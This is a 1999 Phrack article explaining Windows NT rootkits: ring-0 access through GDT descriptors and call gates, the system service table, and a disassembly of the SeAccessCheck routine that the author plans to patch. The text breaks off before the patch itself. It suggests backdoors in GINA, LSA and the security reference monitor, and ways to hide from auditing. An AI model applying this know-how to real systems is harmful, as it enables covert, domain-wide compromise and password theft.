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Current issue : #55 | Release date : 1999-09-09 | Editor : route
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A Real NT RootkitGreg Hoglund
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Title : A Real NT Rootkit
Author : Greg Hoglund
-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 05 of 19  ]

-------------------------[  A *REAL* NT Rootkit, patching the NT Kernel  ]

--------[  Greg Hoglund <hoglund@ieway.com>  ]


First of all, programs such as Back Orifice and Netbus are NOT rootkits.  They
are amateur versions of PC-Anywhere, SMS, or a slew of other commercial
applications that do the same thing.  If you want to remote control a
workstation, you could just as easily purchase the incredibly powerful SMS
system from Microsoft.  A remote-desktop/administration application is NOT a

What is a rootkit?  A rootkit is a set of programs which *PATCH* and *TROJAN*
existing execution paths within the system.  This process violates the
*INTEGRITY* of the TRUSTED COMPUTING BASE (TCB).  In other words, a rootkit is
something which inserts backdoors into existing programs, and patches or breaks
the existing security system.

- A rootkit may disable auditing when a certain user is logged on.
- A rootkit could allow anyone to log in if a certain "backdoor" password is
- A rootkit could patch the kernel itself, allowing anyone to run privileged
  code if they use a special filename.

The possibilities are endless, but the point is that the "rootkit" involves
itself in pre-existing architecture, so that it goes un-noticed.  A remote
administration application such as PC Anywhere is exactly that, an application.
A rootkit, on the other hand, patches the already existing paths within the
target operating system.

To illustrate this, I have included in this document a 4-byte patch to the NT
kernel that removes ALL security restrictions from objects within the NT
domain.  If this patch were applied to a running PDC, the entire domain's
integrity would be violated.  If this patch goes unnoticed for weeks or even
months, it would be next to impossible to determine the damage.

Network based security & the Windows NT Trust Domain

If you know much about the NT Kernel, you know that one of the executive
components is called the Security Reference Monitor (SRM).  The DoD Red Book
also defines a "Security Reference Monitor".  We are talking the same language.
In the Red Book, a security domain is managed by a single entity.

To Quote:
"A single trusted system is accredited as a single entity by a single
accrediting authority.  A ``single trusted system'' network implements a
reference monitor to enforce the access of subjects to objects in accordance
with an explicit and well defined network security policy [DoD Red Book]."

In NT parlance, that is called the Primary Domain Controller (PDC).  Remember
that every system has local security and domain security.  In this case, we are
talking about the domain security.  The PDC's "Security Reference Monitor" is
responsible for managing all of the objects within the domain.  In doing this,
it creates a single point of control, and therefore a "single trusted system"

How to violate system integrity

I know this is alot of book theory, but bear with me just a bit longer.  The
DoD Orange Book also defines a "Trusted Computing Base" (TCB).  If you are an
NT programmer, then you have likely worked with the security privilege
SE_TCB_PRIVILEGE.  That privilege maps to the more familiar "act as part of the
Operating System" User-Right.  Using the User Administrator for NT you can
actually add this privilege to a user.

If you have the ability to act as part of the TCB, you can basically do
anything.  There is very little security implemented between your process and
the rest of the machine.  If the TCB can no longer be trusted, then the
integrity of the entire network system is shot.  The patch I am about to show
you is an example of this.  The patch, if installed on a Workstation, violates
a network "partition".  The patch, if installed on a PDC, violates the entire
network's integrity.

What is a partition?

The Red Book breaks the network into NTCB (Network Trusted Computing Base)
"Partitions".  Any single component or machine on the network may be considered
a "partition".  This makes it convenient for analysis.

To Quote:
"An NTCB that is distributed over a  number  of  network components is referred
to as partitioned, and that part of the NTCB residing in a given component is
referred to as an NTCB partition.  A network host may possess a TCB that has
previously been evaluated as a stand-alone system.  Such a TCB does not
necessarily coincide with the NTCB partition in the host, in the sense of
having the same security perimeter [DoD Red Book]."

On the same host you may have two unique regions, the TCB, which is the
traditional Orange Book evaluation for Trusted Computing Base, and the NTCB.
These partitions do not have to overlap, but they can.  If any component of one
is violated, it is likely that the other is as well.  In other words, if a host
is compromised, the NTCB may also be compromised.

Obviously to install a patch over the TCB, you must already be Administrator,
or have the ability to install a device driver.  Given that Trojans and Virii
work so well, it would be very easy to cause this patch to be installed w/o
someone's knowledge.

Imagine an exploit

Before I digress into serious techno-garble, consider some of the attacks that
are possible by patching the NT kernel.  All of these are possible because we
have violated the TCB itself:

1. Insert invalid data.  Invalid data can be inserted into any network stream.
   It can also introduce errors into the fixed storage system, perhaps subtly
   over time, such that even the backups get corrupted.  This violates
   reliability & integrity.

2. Patch incoming ICMP.  Using ICMP as a covert channel, the patch can read
   ICMP packets coming into the kernel for embedded commands.

3. Patch incoming ethernet.  It can act as a sniffer, but without all of the
   driver components.  If it has patched the ethernet, then it can also stream
   data in/out of the network.  It can sniff crypto keys.

4. Patch existing DLL's, such as wininet.dll, capturing important data.

5. Patch the IDS system.   It can patch a program such as Tripwire or
   RealSecure to violate its integrity, rendering the program unable to detect
   the nastiness...

6. Patch the auditing system, i.e., event log, to ignore certain event log

Now for the rare steak.  Let's delve into an actual kernel patch.  If you
already understand protected mode and the global descriptor table, then you can
skip this next section.  Otherwise put on your hiking boots, there are a couple
of switchbacks ahead.

Rings of Power

Windows NT is unlike DOS or Windows 95 in that it has process-space security.
Every user-mode process has an area of memory that is protected by a Security
Descriptor.  Usually this SD is determined from the Access Token of the user
that started the process.  Access to all objects is handled through a "Access
Control List".  For Windows NT, this is called "Discretionary Access Control".
Personally I find it really hard to grasp something if I don't understand it's
most basic details.  So, this next section describes the very foundation that
makes security possible on the x86 architecture.

First, it is important to understand "protected mode".  Protected mode can only
be understood by memory addressing.  Almost all of the expanded capabilities of
the x86 processor are built upon memory addressing.  Protected mode gives you
access to a 4 GB memory space.  Multitasking and privilege levels are all
based upon tricks with memory addressing.  This discussion only applies to 386
and beyond.

Memory is divided into code and data segments.  In protected mode, all memory
is addressed as a segment + an offset.  Conversely, in real mode, everything is
interpreted as an actual address.  For our discussion, we only care about
protected mode.  In protected mode things get a little more complicated.  We
must address first the segment, followed by an offset into that segment.  It
is sort of a two step process.  Why is this interesting??  This is how most
modern operating systems work, and it is important for exploits and Virii.  Any
modern mobile code must be able to work within this arena.

What is a selector?

A selector is just a fancy word for a memory segment.  Memory segments are
organized by a table.  These table entries are often called descriptors.  So,
remember, a selector is-a segment is-a descriptor.  It's all the same thing.

If you understand how the memory segments are kept track of, then you pretty
much understand the whole equation.   Every memory segment is first a virtual
address (16-bits) plus an offset from that address (32-bits).  A segment is not
an actual address, like in realmode, but the number of a selector it wants to
use.  A selector is usually a small integer number.  This small number is an
offset into a table of descriptors.  In turn, the descriptor itself then has
the actual linear address of the beginning of the memory segment.  In addition
to that, the descriptor has the access privilege of the memory segment.

Descriptors are stored in a table called the Global Descriptor Table (GDT).
Each descriptor has a Descriptor Privilege Level (DPL), indicating what ring
the memory segment runs in.

Suffice it to say, the selector is your vehicle.  Under NT and 95, there
are selectors which cover the entire 4GB address range.  If you were using
one of these selectors, you could walk all over the memory map from 0 to
whatever.  These selectors do exist, and they are protected by a DPL of 0.
Under Windows 9x, selector 28 is a ring 0 that covers the entire 4gb region.
Under NT, selectors 8 and 10 achieve the same purpose.

Dumping the GDT from SoftIce produces a table similar to this:

GDTBase=80036000 Limit=0x03FF

0008  Code32   00000000  FFFFFFFF  0     P   RE
0010  Data32   00000000  FFFFFFFF  0     P   RW
001B  Code32   00000000  FFFFFFFF  3     P   RE
0023  Data32   00000000  FFFFFFFF  3     P   RW
0028  TSS32    8001D000  000020AB  0     P   B
0048  Reserved 00000000  00000000  0     NP
0060  Data16   00000400  0000FFFF  3     P   RW
etc, etc ....

You can see what segment you are currently using by checking the CPU registers.
The registers SS, DS, and CS indicate which selectors are being used for Stack
Segment, Code Segment, and Data Segment.  The stack and code segments must be
in the same ring.

1. Segments can overlap one another.  In other words, more than one segment can
represent the same address-space.  Segments can overlap one another wholly, or
only in part.  The address range for a segment is important, of course, but
there is other delicious information we care about.  For instance, a segment
also has a Privilege Level (DPL).

 ----     ----
|    |   |    |
|    |   |    |
|    |    ----
|    |         ----
|    |        |    |
|    |        |    |
 ----         |    |
              |    |

What is a DPL?

Descriptor Privilege Level.  This is important to understand.  Every memory
segment is protected by a privilege level, often called a "ring".  The Intel
processor has 4 rings, 0 through 3, usually only ring 0 and 3 are used.  Lower
ring levels have more privilege.  In order to access a memory segment, the
caller must have a current privilege level equal to or lower than the one being
accessed.  Current privilege level is often called CPL, and descriptor
privilege level is often called DPL.

This type of protection is a requirement for almost any security architecture.
In the old days of DOS, mobile code such as virii were able to hook interrupts
and execute any code at whim.  They were walking all over the memory map at
will.  No such luck with the advent of Windows NT.  There's a gaping need for
Windows NT exploits that can take advantage of the old tricks.  The central
problem is that most code is executing within user mode, and has not access to
ring 0, and therefore no access to the Interrupt Descriptor Table or the
memory map as a whole.

Under NT, the access to ring 0 is controlled from the right to add your own
selector to the GDT.  When you transition to ring 0, you are still in protected
mode and the Virtual Memory Manager is still operating.

Lets suppose you have written a virus that patches the Global Descriptor Table
(GDT) and adds a new descriptor.  This new descriptor describes a memory
segment that covers the entire range of the map, from 0 to FFFFFFFF___.  The
DPL of the descriptor is 0, so any code running from it can access other ring-0
segments.  In fact, it can access the entire map.  A DPL 0 memory segment
marked as "conforming" will violate integrity.  The sensitivity label, in this
regard, would be the DPL.  The fact it is conforming violates the DPL's of
other segments, if they overlap.

If your descriptor is marked conforming, it can be called freely from ring-3
(user mode).  This new entry goes unnoticed, of course.  Who monitors the GDT
on their system?  Most people don't even know what that is.  There are few IDS
systems that monitor this type of information.  Now you have effectively placed
a backdoor into the memory map.  You could be running under any process token,
and have full read/write access to the map.  This means reading/writing other
important tables, such as the Interrupt Table.  This means reading other
procii's protected memory.  This means infecting other files and procii w/ your
virii at whim.

Patching the SRM

The Security Reference Monitor is responsible for enforcing access control.
Under NT, all of the SRM functions are handled by ntoskrnl.exe.  If the
integrity of that code were violated, then the SRM could no longer be trusted.
The whole security system has failed.

The Security Reference Monitor is responsible for saying Yes/No to any object
access.  It consults a process table to determine your current running process'
access token.  It then compares the access token with the required access of
the object.  Every object has a Security Descriptor (SD).  Your running 
process has an Access Token.  Comparing these two structures, the SRM is able 
to deny or allow you access to the object.

orange book:
"In October of 1972, the Computer Security Technology Planning Study, conducted
by James P.  Anderson & Co., produced a report for the Electronic Systems
Division (ESD) of the United States Air Force.[1]  In that report, the concept
of "a reference monitor which enforces the authorized access relationships
between subjects and objects of a system" was introduced.  The reference
monitor concept was found to be an essential element of any system that would
provide multilevel secure computing facilities and controls."

It then listed the three design requirements that must be met by a reference
validation mechanism:
     a. The reference validation mechanism must be tamper proof.
     b. The reference validation mechanism must always be invoked.
     c. The reference validation mechanism must be small enough to be
        subject to analysis and tests, the completeness of which can
        be assured."[1]

The SRM is *NOT* tamper proof.  It may be protected by the TCB security
privilege, but I suggest that the only truly tamper-proof SRM is going to use
cryptographic mechanisms.  Using an attack vector such as Virii or Trojan's, a
patch could easily be placed within the TCB.

You can patch the SRM itself if you have access to the map.  In this, you can
insert a backdoor such that a certain user-id ALWYAS has access.  However, this
does not require you to edit the user's security level in any way.  You are
patching it at the access point, not the source.  So, auditing programs will
not be able to notice the problem.  This is a simple trick that could be
employed in any NT RootKit.

There are several key components to the NT Kernel.  They are sometimes
referred to as the "NT Executive".  The NT executive is really a group of
individual components with a well defined interface.  Each component has such a
well defined interface, in fact, that you could actually take it out completely
and replace it with a new one.  As long as the new component implemented all of
the same interfaces, then the system would continue to function.  The following
are all components of the NT Executive:

   HAL: Hardware Abstraction Layer, HAL.DLL
   NTOSKERNL:  Contains several components, NTOSKRNL.EXE
      The Virtual Memory Manager (VMM)
      The Security Reference Monitor (SRM)
      The I/O Manager
      The Object Manager
      The Process and Thread Manager
      The Kernel Services themselves
       -(Exception handling and runtime library)
      LPC Manager (Local Procedure Call)

Hey, these are some of the modules listed when a Blue Screen occurs!  The
system is just a big memory map!

With all of this data we are bound to find structures of interest!  Many key
data structures are crucial to security.  Once we know what we are looking for,
we can get into SoftIce and start poking around.  A list of the exported
functions for some of these components is in Appendix A.

Using a tool such as SoftIce, reverse engineering the SRM and other components
is easy ;)  The methodology is simple.  First, we must find the component we
are interested in.  They all sit in system memory at some point...

Some key data structures are:
    ACL (Access Control List), contains ACE's
    ACE (Access Control Entry), has a 32-bit Access Mask and a SID
    SID (Security Identifier), a big number
    PTE (Page Table Entry)
    SD  (Security Descriptor), has an Owner SID, a Group SID, and an ACL
    AT  (Access Token)

Now for some tricks!  The first thing we need to do is identify which of these
data structures we will be using.  If we want to reverse engineer the Security
Reference Monitor, then we can be assured that our SID is going to be used in
some call somewhere.. This is where SoftIce comes in.  SoftIce has an
incredible feature called expressions.  SoftIce will let you define a regular
expression to be evaluated for a breakpoint.  In other words, I can tell
SoftIce to break if only a special set of circumstances has occurred.

So, for example (working implementation):

1. I want softice to break if the ESI register references my SID.  Since a SID
is many words long, I will have to define the expression in several portions:

bpx (ESI->0 == 0x12345678) && (ESI->4 == 0x90123456) && (ESI->8 == 0x78901234)

What I have done here is tell softice to break if the ESI register points to
the data: 0x123456789012345678901234.  Notice how I use the -> operator to
offset ESI for each word.

Now, try to access an object.  SoftIce will promptly break when your SID is
used in a call.

There are many system components that are worth reverse engineering.  You may
also want to play with the following:
    1. GINA, (GINA.DLL) The logon screen you see when you type your
       password. Imagine if this component was trojaned.. A Virii could
       capture passwords across the enterprise.
    2. LSA (The Local System Authority) This is the module responsible for
       querying the SAM database.  This would be an ideal place to put a
       rootkit-password that *ALWAYS* allows you access to the system.
    3. SSDT, The System Service Descriptor Table
    4. GDT, the Global Descriptor Table
    5. IDT, the Interrupt Descriptor Table

Getting to ring zero in the first place

User mode is very limiting under NT.  Your process is bound by the selector it
is currently using.  The process cannot simply waltz over the entire memory
map.  As we have discussed, the process must first load a selector.  You cannot
simply read memory from 0 to FFF_, you can only access your own memory segment.

There are tricks however.  If the process is running under a user token that
has "add service" privilege, then you can create your own call gate, install
it in realtime, and then use it to run your code ring 0.  Once you are running
ring 0 you can patch the IDT or the Kernel.  This is how User-Mode normally
accesses a Ring-0 Code Segment.  If you don't want to go to this trouble,
you can upload a byte patcher that runs in ring zero on boot.  This is as
simple as writing a driver and installing to run on the next reboot.
However, installing your own call-gate is by far the most sexy.

Lets talk sexy.  The answer is a call gate.  All of the functions provided by
NTDLL.DLL are implemented this way.  This is why you must call Int 2Eh to make
a call.  The entire set of Int 2Eh functions are known as the Native Call
Interface (NCI).  What really happens is the Int 2Eh is handled by a function
in NTOSKRNL.EXE.  This function is called KiSystemService().  
KiSystemService() routes the call to the proper code location.

When you make a system call, you must first load the index of the function you
wish to call.  This is loaded into register EAX.  Next, if the call takes
parameters, a pointer to this block is loaded into EDX.  Interrupt 2Eh is
called, and EAX holds the return value.  This is old hat to most assembler

What is not obvious is how this is implemented in the Kernel.  The function
KiSystemService() is called, and left with the responsibility for dispatching
the call.  KiSystemService() must first determine *WHAT* function to call next,
based on what we put in EAX.  So, to this end, it maintains a table of
functions and their index numbers.. imagine that!  SofIce will dump this table
if your interested.  It looks something like:

Service table address: 80149398  Number of services:000000D4
0000  0008:8017451E  params=06  ntoskrnl!NtConnectPort+0834
0001  0008:80199C16  params=08  ntoskrnl!SeQueryAuthenticationIdToken+04B8
0002  0008:8019B3A2  params=0B  ntoskrnl!SePrivilegeObjectAuditAlarm+02B0
0003  0008:80158E50  params=02  ntoskrnl!NtAddAtom
0004  0008:80197624  params=06  ntoskrnl!NtAdjustPrivilegesToken+0422
0005  0008:80197202  params=06  ntoskrnl!NtAdjustPrivilegesToken
0006  0008:80196256  params=02  ntoskrnl!PsGetProcessExitTime+1848
0007  0008:8019620E  params=01  ntoskrnl!PsGetProcessExitTime+1800
0008  0008:8015901E  params=01  ntoskrnl!NtAllocateLocallyUniqueId
0009  0008:801592EC  params=03  ntoskrnl!NtAllocateUuids
000A  0008:8017B0F6  params=06  ntoskrnl!NtAllocateVirtualMemory
000B  0008:8011B8E4  params=03  ntoskrnl!ZwYieldExecution+08AC
etc etc...

Well, this is all very interesting, but where is this table stored?  How does
SoftIce manage to read it?  Of course, it's all undocumented ;-)  Here I have
no one to thank more than my friend from Sri Lanka, a fellow Rhino9 member, who
goes by the handle Joey__.  His paper on extending the NCI is nothing less than
mind-blowing.  I draw heavily upon his research for this section.  I feel this
paper could not be complete without going over call-gates and the NCI, so I
paraphrase some of his work.  For more detailed information on adding your own
system services, read his paper entitled "Adding New Services to the NT Kernel
Native API".

A very interesting thing happens when you boot NT.  You start with about 200
functions in the NCI.  These are all implemented in NTOSKRNL.EXE.  But, soon
afterwards, another 500 or so functions are added to the NCI, these being
implemented in WIN32K.SYS.  The fact that additional functions were added
proves that it is possible to register new functions into the NCI during

The table that SoftIce dumps when you type NTCALL is called the System Service
Descriptor Table (SSDT).  The SSDT is what the KiSystemService() function uses
to look up the proper function for a Int 2Eh call.  Given that the NCI is
extensible, it must be possible to add new functions to this table.

As it turns out, there are actually multiple tables.  WIN32K.SYS doesn't
actually add to the EXISTING system table, but creates a whole NEW one with 500
or so functions, and then ADDS it to the Kernel.  To do this, it calls the
exported function KeAddSystemServiceTable().  So, in a nutshell, all we have to
do is create a new table with OUR functions and do the same thing.

Another angle on this involves adding our functions to the existing NCI table.
But, this involves patching memory.  Again, that's what we do best.  To pull
this trick off cleanly, we must allocate new memory large enough to hold the
old tables plus our additional entries.  We then must copy the old tables 
into our new memory, add our entries, and then patch memory so that 
KiSystemService() looks at our new table.

The FOUR-Byte Patch

Okay, lesson number one.  Don't make yourself do extra work when you don't have
to.  This is the story of my life.  I started this project by reversing the
RtlXXX subroutines.  For instance, there is a routine called
RtlGetOwnerSecurityDescriptor().  This is a simple utility function that
returns the Owner SID for a given security descriptor.  I patched this routine
to check for the BUILTIN\Administrators group, and alter it to be the
BUILTIN\Users group.  Although this patch works, it doesn't help me obtain
access to protected files and shares.  The RTL routine is only called for
Process and Thread creation, it would seem.  So, to make a long story short, I
have included the RTLXXX information and patch below.  It will illustrate a
working kernel patch and should help you see my thought process as I 0wned a
key kernel function.

Okay, lesson number two.  If at first you don't succeed, try another function.
This time I got very wise and decided to test a number of breakpoints in the
Kernel before doing any extra work. Because I wanted to circumvent access to a
file directly, I moved directly onward to the SeAccessCheck() function.  Up
front, I set a breakpoint on this function to make sure it is being called when
accessing a file.  To my excitement, it appears this function is called for
almost any object access, not just a file.  This means network shares as well.
Going further, I tested my next patch against network share access as well as
file access.  I created a test directory, shared it over the network, and
created a test file within that directory.

At first, the file had the default Everyone FULL CONTROL permissions.  I set a
breakpoint on SeAccessCheck() and attempted to cat the file. For this simple
command the function is called three times:

Break due to BPX ntoskrnl!SeAccessCheck  (ET=2.01 seconds)
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D1C)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711734)
Break due to BPX ntoskrnl!SeAccessCheck  (ET=991.32 microseconds)
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711CB8)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD7116D8)
Break due to BPX ntoskrnl!SeAccessCheck  (ET=637.15 microseconds)
Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D08)
=> ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711720)

Next I set the file access to Administrator NO ACCESS.  Attempting to cat the
file locally resulted in an "Access Denied" message. The routine is called 13
times before the Access Denied message is given.  Now I try to access it over
the network.  The function is called a total of 18 times before a Access Denied
message is given.  It would seem it takes alot more work to deny access than it
does to give it. ;)

I was lit now, it looked like I had my target.  After another 2 shots of
espresso, I dumped the IDA file for SeAccessCheck, busted into SoftIce and
started exploring:

To make things simpler, I have removed some of the assembly code that is not
part of my discussion.  If you are going to start playing with this, then you
should disassemble all of this yourself nonetheless.  I recommend IDA.  At
first I tried WDAsm32, but it was unable to decompile the ntoskrnl.exe 
binary properly.  IDA, on the other hand, had no problems.  WDAsm32 has a 
much nicer GUI interface, but IDA has proved more reliable.  Just as most 
engineers, I use many tools to get the job done, so I recommend having both
disassemblers around.

The function & patches:
8019A0E6 ; Exported entry 816. SeAccessCheck
8019A0E6 ;
8019A0E6 ;		 S u b r o u t i n e
8019A0E6 ; Attributes: bp-based	frame
8019A0E6		 public	SeAccessCheck
8019A0E6 SeAccessCheck	 proc near
8019A0E6					 ; sub_80133D06+B0p ...
8019A0E6 arg_0		 = dword ptr  8		 ; appears to point to a
						 ; Security Descriptor
8019A0E6 arg_4		 = dword ptr  0Ch
8019A0E6 arg_8		 = byte	ptr  10h
8019A0E6 arg_C		 = dword ptr  14h
8019A0E6 arg_10		 = dword ptr  18h
8019A0E6 arg_14		 = dword ptr  1Ch
8019A0E6 arg_18		 = dword ptr  20h
8019A0E6 arg_1C		 = dword ptr  24h
8019A0E6 arg_20		 = dword ptr  28h
8019A0E6 arg_24		 = dword ptr  2Ch
8019A0E6		 push	 ebp
8019A0E7		 mov	 ebp, esp
8019A0E9		 push	 ebx
8019A0EA		 push	 esi
8019A0EB		 push	 edi
8019A0EC		 cmp	 byte ptr [ebp+arg_1C],	0
8019A0F0		 mov	 ebx, [ebp+arg_C]
8019A0F3		 jnz	 short loc_8019A137
8019A0F5		 test	 ebx, 2000000h
8019A0FB		 jz	 short loc_8019A11D
8019A0FD		 mov	 eax, [ebp+arg_18]
8019A100		 mov	 edi, [ebp+arg_20]
8019A103		 mov	 ecx, ebx
8019A105		 mov	 eax, [eax+0Ch]
8019A108		 and	 ecx, 0FDFFFFFFh
8019A10E		 mov	 [edi],	eax
8019A110		 or	 ecx, eax
8019A112		 mov	 eax, [ebp+arg_10]
8019A115		 or	 eax, ecx
8019A117		 mov	 [edi],	ecx
8019A119		 mov	 [edi],	eax
8019A11B		 jmp	 short loc_8019A13A
8019A11D ;
8019A11D loc_8019A11D:				 ; CODE	XREF: SeAccessCheck+15
8019A11D		 mov	 eax, [ebp+arg_10]
8019A120		 mov	 edi, [ebp+arg_20]
8019A123		 or	 eax, ebx
8019A125		 mov	 edx, [ebp+arg_24]
8019A128		 mov	 [edi],	eax
8019A12A		 mov	 al, 1
8019A12C		 mov	 dword ptr [edx], 0
8019A132		 jmp	 loc_8019A23A
8019A137 ;
8019A137 loc_8019A137:				 ; CODE	XREF: SeAccessCheck+D
8019A137		 mov	 edi, [ebp+arg_20]
8019A13A loc_8019A13A:				 ; CODE	XREF: SeAccessCheck+35
8019A13A		 cmp	 [ebp+arg_0], 0
8019A13E		 jnz	 short loc_8019A150
8019A140		 mov	 edx, [ebp+arg_24]
8019A143		 xor	 al, al
				 ; under normal means
8019A145		 mov	 dword ptr [edx], 0C0000022h
8019A14B		 jmp	 loc_8019A23A
8019A150 ;
8019A150 loc_8019A150:				 ; CODE	XREF: SeAccessCheck+58
8019A150		 mov	 esi, [ebp+arg_4]
8019A153		 cmp	 dword ptr [esi], 0
8019A156		 jz	 short loc_8019A16E
8019A158		 cmp	 dword ptr [esi+4], 2
8019A15C		 jge	 short loc_8019A16E
8019A15E		 mov	 edx, [ebp+arg_24]
8019A161		 xor	 al, al
				 ; not normally hit
8019A163		 mov	 dword ptr [edx], 0C00000A5h
8019A169		 jmp	 loc_8019A23A
8019A16E ;
8019A16E loc_8019A16E:				 ; CODE	XREF: SeAccessCheck+70
8019A16E					 ; SeAccessCheck+76
8019A16E		 test	 ebx, ebx
8019A170		 jnz	 short loc_8019A1A0
8019A172		 cmp	 [ebp+arg_10], 0
8019A176		 jnz	 short loc_8019A188
8019A178		 mov	 edx, [ebp+arg_24]
8019A17B		 xor	 al, al
				 ; normally hit
8019A17D		 mov	 dword ptr [edx], 0C0000022h
8019A183		 jmp	 loc_8019A23A
8019A188 ;
8019A188 loc_8019A188:				 ; CODE	XREF: SeAccessCheck+90
8019A188		 mov	 eax, [ebp+arg_10]
8019A18B		 xor	 ecx, ecx
8019A18D		 mov	 edx, [ebp+arg_24]
8019A190		 mov	 [edi],	eax
8019A192		 mov	 eax, [ebp+arg_14]
8019A195		 mov	 [edx],	ecx
8019A197		 mov	 [eax],	ecx
8019A199		 mov	 al, 1
8019A19B		 jmp	 loc_8019A23A
8019A1A0 ;
8019A1A0 loc_8019A1A0:				 ; CODE	XREF: SeAccessCheck+8A
8019A1A0		 cmp	 [ebp+arg_8], 0
8019A1A4		 jnz	 short loc_8019A1AC
8019A1A6		 push	 esi
8019A1A7		 call	 SeLockSubjectContext
8019A1AC loc_8019A1AC:				 ; CODE	XREF: SeAccessCheck+BE
8019A1AC		 test	 ebx, 2060000h
8019A1B2		 jz	 short loc_8019A1EA
8019A1B4		 mov	 eax, [esi]
8019A1B6		 test	 eax, eax
8019A1B8		 jnz	 short loc_8019A1BD
8019A1BA		 mov	 eax, [esi+8]
8019A1BD loc_8019A1BD:				 ; CODE	XREF: SeAccessCheck+D2
8019A1BD		 push	 1
8019A1BF		 push	 [ebp+arg_0]
8019A1C2		 push	 eax
8019A1C3		 call	 sub_8019A376
8019A1C8		 test	 al, al
8019A1CA		 jz	 short loc_8019A1EA
8019A1CC		 test	 ebx, 2000000h
8019A1D2		 jz	 short loc_8019A1DA
8019A1D4		 or	 byte ptr [ebp+arg_10+2], 6
8019A1D8		 jmp	 short loc_8019A1E4
8019A1DA ;
8019A1DA loc_8019A1DA:				 ; CODE	XREF: SeAccessCheck+EC
8019A1DA		 mov	 eax, ebx
8019A1DC		 and	 eax, 60000h
8019A1E1		 or	 [ebp+arg_10], eax
8019A1E4 loc_8019A1E4:				 ; CODE	XREF: SeAccessCheck+F2
8019A1E4		 and	 ebx, 0FFF9FFFFh
8019A1EA loc_8019A1EA:				 ; CODE	XREF: SeAccessCheck+CC
8019A1EA					 ; SeAccessCheck+E4
8019A1EA		 test	 ebx, ebx
8019A1EC		 jnz	 short loc_8019A20C
8019A1EE		 cmp	 [ebp+arg_8], 0
8019A1F2		 jnz	 short loc_8019A1FA
8019A1F4		 push	 esi
8019A1F5		 call	 SeUnlockSubjectContext
8019A1FA loc_8019A1FA:				 ; CODE	XREF: SeAccessCheck+10
8019A1FA		 mov	 eax, [ebp+arg_10]
8019A1FD		 mov	 edx, [ebp+arg_24]
8019A200		 mov	 [edi],	eax
8019A202		 mov	 al, 1
8019A204		 mov	 dword ptr [edx], 0
8019A20A		 jmp	 short loc_8019A23A
8019A20C ;

Since most of the arguments are being passed to this, it looks like this
routine is a wrapper for this other one.. lets delve deeper....

8019A20C loc_8019A20C:				 ; CODE	XREF: SeAccessCheck+106
8019A20C		 push	 [ebp+arg_24]
8019A20F		 push	 [ebp+arg_14]
8019A212		 push	 edi
8019A213		 push	 [ebp+arg_1C]
8019A216		 push	 [ebp+arg_10]
8019A219		 push	 [ebp+arg_18]
8019A21C		 push	 ebx
8019A21D		 push	 dword ptr [esi]
8019A21F		 push	 dword ptr [esi+8]
8019A222		 push	 [ebp+arg_0]
8019A225		 call	 sub_80199836		; decompiled below ***
8019A22A		 cmp	 [ebp+arg_8], 0
8019A22E		 mov	 bl, al
8019A230		 jnz	 short loc_8019A238
8019A232		 push	 esi
8019A233		 call	 SeUnlockSubjectContext	 ; not usually hit
8019A238 loc_8019A238:				 ; CODE	XREF: SeAccessCheck+14A
8019A238		 mov	 al, bl
8019A23A loc_8019A23A:				 ; CODE	XREF: SeAccessCheck+4C
8019A23A					 ; SeAccessCheck+65 ...
8019A23A		 pop	 edi
8019A23B		 pop	 esi
8019A23C		 pop	 ebx
8019A23D		 pop	 ebp
8019A23E		 retn	 28h
8019A23E SeAccessCheck	 endp

Subroutine called from SeAccessCheck.  Looks like most of work is being done in
here.  I will try to patch this routine.

80199836 ;
80199836 ;		 S u b r o u t i n e
80199836 ; Attributes: bp-based	frame
80199836 sub_80199836	 proc near		 ; CODE	XREF: PAGE:80199FFA
80199836					 ; SeAccessCheck+13F ...
80199836 var_14		 = dword ptr -14h
80199836 var_10		 = dword ptr -10h
80199836 var_C		 = dword ptr -0Ch
80199836 var_8		 = dword ptr -8
80199836 var_2		 = byte	ptr -2
80199836 arg_0		 = dword ptr  8
80199836 arg_4		 = dword ptr  0Ch
80199836 arg_8		 = dword ptr  10h
80199836 arg_C		 = dword ptr  14h
80199836 arg_10		 = dword ptr  18h
80199836 arg_16		 = byte	ptr  1Eh
80199836 arg_17		 = byte	ptr  1Fh
80199836 arg_18		 = dword ptr  20h
80199836 arg_1C		 = dword ptr  24h
80199836 arg_20		 = dword ptr  28h
80199836 arg_24		 = dword ptr  2Ch
80199836		 push	 ebp
80199837		 mov	 ebp, esp
80199839		 sub	 esp, 14h
8019983C		 push	 ebx
8019983D		 push	 esi
8019983E		 push	 edi
8019983F		 xor	 ebx, ebx
80199841		 mov	 eax, [ebp+arg_8]	; pulls eax
80199844		 mov	 [ebp+var_14], ebx	; ebx is zero, looks
							; like it init's a
							; bunch of local vars
80199847		 mov	 [ebp+var_C], ebx
8019984A		 mov	 [ebp-1], bl
8019984D		 mov	 [ebp+var_2], bl
80199850		 cmp	 eax, ebx		; check that arg8 is
							; NULL
80199852		 jnz	 short loc_80199857
80199854		 mov	 eax, [ebp+arg_4]	; arg4 pts to
							; "USER32  "
80199857 loc_80199857:
80199857		 mov	 edi, [ebp+arg_C]	; checking some flags
							; off of this one
8019985A		 mov	 [ebp+var_8], eax	; var_8 = arg_4
8019985D		 test	 edi, 1000000h		; obviously flags..
							; desired access mask
							; I think...

80199863		 jz	 short loc_801998CA	; normally this jumps..
							; go ahead and jump
80199865		 push	 [ebp+arg_18]
80199868		 push	 [ebp+var_8]
8019986B		 push	 dword_8014EE94
80199871		 push	 dword_8014EE90
80199877		 call	 sub_8019ADE0		; another undoc'd sub
8019987C		 test	 al, al			; return code
8019987E		 jnz	 short loc_80199890
80199880		 mov	 ecx, [ebp+arg_24]
80199883		 xor	 al, al
80199885		 mov	 dword ptr [ecx], 0C0000061h
8019988B		 jmp	 loc_80199C0C
80199890 ;
		removed source here
801998CA ;
801998CA loc_801998CA:				 ; jump from above lands here
801998CA					 ; sub_80199836
801998CA		 mov	 eax, [ebp+arg_0]	; arg0 pts to a
							; Security Descriptor
801998CD		 mov	 dx, [eax+2]		; offset 2 is that
							; 80 04 number...
801998D1		 mov	 cx, dx
